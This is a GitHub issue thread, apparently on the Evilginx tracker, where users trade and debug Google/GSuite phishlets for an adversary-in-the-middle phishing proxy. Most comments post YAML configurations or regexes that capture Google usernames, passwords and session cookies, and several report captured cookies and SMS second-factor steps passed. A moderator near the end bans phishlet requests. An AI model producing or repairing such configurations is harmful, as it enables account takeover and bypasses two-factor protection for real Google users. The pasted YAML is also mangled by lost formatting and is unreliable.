sebastiangonzalezbotasi
commented
1 year ago What Gsuite Phishlets Are You Using?
Closed Ineed2p247 closed 1 year ago
sebastiangonzalezbotasi
commented
1 year ago What Gsuite Phishlets Are You Using?
ssl-user-en
commented
1 year ago it is because of the v3 upgrade by google.
globally0x
commented
1 year ago @ssl-user-en can you share your google.yaml for study?
globally0x
commented
1 year ago @Ineed2p247 can you share your Gsuite Phishlets?
Ineed2p247
commented
1 year ago @globally0x
author: '@ineed2p247' min_ver: '2.3.0'
proxy_hosts:
sub_filters:
auth_tokens:
credentials: username: key: 'f.req' search: '[]]\,\"([^"])\"\,' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'
auth_urls:
login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'
force_post:
Ineed2p247
commented
1 year ago @ssl-user-en What's the new regex to grab the password?
globally0x
commented
1 year ago @Ineed2p247 Thanks a lot, I will test now!
globally0x
commented
1 year ago @Ineed2p247 cookie catched. Great work!
Ineed2p247
commented
1 year ago @globally0x What's the new regex to grab the password?
globally0x
commented
1 year ago @globally0x What's the new regex to grab the password?
'null,[\"([^"]*)\",'
globally0x
commented
1 year ago 'null,[\"([^"]*)\",' Test good in chrome windows. It can not use to capture username & password in android.
sebastiangonzalezbotasi
commented
1 year ago Hello Has it happened to you when using google phishlets that after adding users, password and receiving a second validation (code to the cell phone) after clicking on "next" it shows you this?
lhost25
commented
1 year ago @globally0x What's the new regex to grab the password?
'null,[\"([^"]*)\",'
the main issue is it's not getting user n pass and this code shows an error during importation. Does anyone have the idea of the correct details for getting the user n pass?
globally0x
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'
lhost25
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'
thanks, sir for the details but i keep getting this error message after those credentials
Kevin3-00
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'
This is what I continue to get
joemorning2
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'
What exactly do you want to achieve with the error message you getting?
Kevin3-00
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'
What exactly do you want to achieve with the error message you getting?
It means you can't load that phishlets to other phishlets folder
joemorning2
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'
What exactly do you want to achieve with the error message you getting?
It means you can load that phishlets to other phishlets folder
Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?
I will advise you to be specific so that people can help you. Your picture did not point out the help you need.
Human beings with their pride.
Kevin3-00
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'
What exactly do you want to achieve with the error message you getting?
It means you can load that phishlets to other phishlets folder
Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?
I will advise you to be specific so that people can help you. Your picture did not point out the help you need.
Human beings with their pride. author: '@Ineed2p247' min_ver: '2.3.0'
proxy_hosts:
{phish_sub: 'www', orig_sub: 'www', domain: 'google.com', session: false, is_landing: false,} {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} {phish_sub: 'ssl', orig_sub: 'ssl', domain: 'gstatic.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'play', orig_sub: 'play', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'myaccount', orig_sub: 'myaccount', domain: 'google.com', session: true , is_landing: false, auto_filter: true} {phish_sub: 'apis', orig_sub: 'apis', domain: 'google.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'content', orig_sub: 'content', domain: 'googleapis.com', session: false, is_landing: false, auto_filter: false} {phish_sub: 'youtube', orig_sub: 'accounts', domain: 'youtube.com', session: false, is_landing: false, auto_filter: false} sub_filters:
{triggers_on: 'accounts.google.com', orig_sub: 'accounts', domain: 'google.com', search: 'accounts.google.com', replace: 'accounts.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} {triggers_on: 'myaccount.google.com', orig_sub: 'myaccount', domain: 'google.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['application/json', 'text/html', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'application/xml']} auth_tokens:
domain: '.google.com' keys: [".,regexp"] domain: 'accounts.google.com' keys: [".,regexp"] domain: 'accounts.google.bg' keys: [".,regexp"] domain: 'myaccount.google.com' keys: [".,regexp"] domain: 'mail.google.com' keys: [".*,regexp"] credentials: username: key: 'f.req' search: '[]],"([^"])",' type: 'post' password: key: 'f.req' search: ',["([^"])",' type: 'post'
auth_urls:
'/CheckCookie' '/_/AccountSettingsUi/browserinfo' login: domain: 'accounts.google.com' path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'
force_post:
path: '/_/signin/sl/challenge' search: {key: 'f.req', search: '.'} {key: 'continue', search: '.'} force: {key: 'continue', value: ''} type: 'post'``
Take a look at this phishlets after making corrections based on @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post' When you upload it it will get uploaded and will show you there's a problem on line 7 which is what you are seen in the photo.
Kevin3-00
commented
1 year ago
- {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false}
{phish_sub: 'accounts', orig_sub: 'accounts', domain: 'google.com', session: true, is_landing: true, auto_filter: false} This line has problem on the phishlets.
Kevin3-00
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,"([^"])",' type: 'post' password: key: 'f.req' search: 'null,["([^"])",' type: 'post'
What exactly do you want to achieve with the error message you getting?
It means you can load that phishlets to other phishlets folder
Imagine. you posted a picture without you been specific about the assistance you need. If I don't know and you know how to, why seek help here?
I will advise you to be specific so that people can help you. Your picture did not point out the help you need.
Human beings with their pride. https://github.com/joemorning2
Seriously?you joined gith just yesterday and your first post would be to hide as some expert on evilginx or i guess you were here before with different i.d and got blocked.Before accusing me of being prideful learn first,since I showed you what the problem was you returned to your shell and hide isn't it?Give me a break and allow people with know how to contribute
rhks
commented
1 year ago Who has a working Google phishlet
rhks
commented
1 year ago @lhost25 credentials: username: key: 'f.req' search: '"[null,\"([^"])\",' type: 'post' password: key: 'f.req' search: 'null,[\"([^"])\",' type: 'post'
This doesn't seem to work
Ineed2p247
commented
1 year ago @rhks yes it's not working
Ineed2p247
commented
1 year ago Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment
Kevin3-00
commented
1 year ago Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment
Please I can we also make it work presently is not capturing username but pass and cookies
rhks
commented
1 year ago Thanks to y'all for the contribution , i have a working phishlet now, i will be closing my comment
Do you mind sharing your working phishlet
sebastiangonzalezbotasi
commented
1 year ago Hello everyone, I'm having a problem that I'm not understanding well what can happen. I am using this version of phishets. Running the program in localhost mode works very well all three steps: a) user b) password c) code by sms d) cookie capture The problem occurs when I run the program in real mode on a server. Although I go through the steps of users, password and code by sms; in the last accept it throws the following error:
Support-1535
commented
1 year ago Hello! If you were already able to resolve your doubts and achieve your goals, close the issue so that we know which ones are pending.
Thank you!
DO NOT ASK FOR PHISHLETS.
DO NOT ASK FOR HELP CREATING PHISHLETS.
DO NOT ASK TO FIX PHISHLETS.
DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.
EXPECT A BAN OTHERWISE. THANK YOU!
REPORT ONLY BUGS OR FEATURE SUGGESTIONS.
Gsuite phishlets does not capture mail/pass, only Cookies. what am i missing please advise.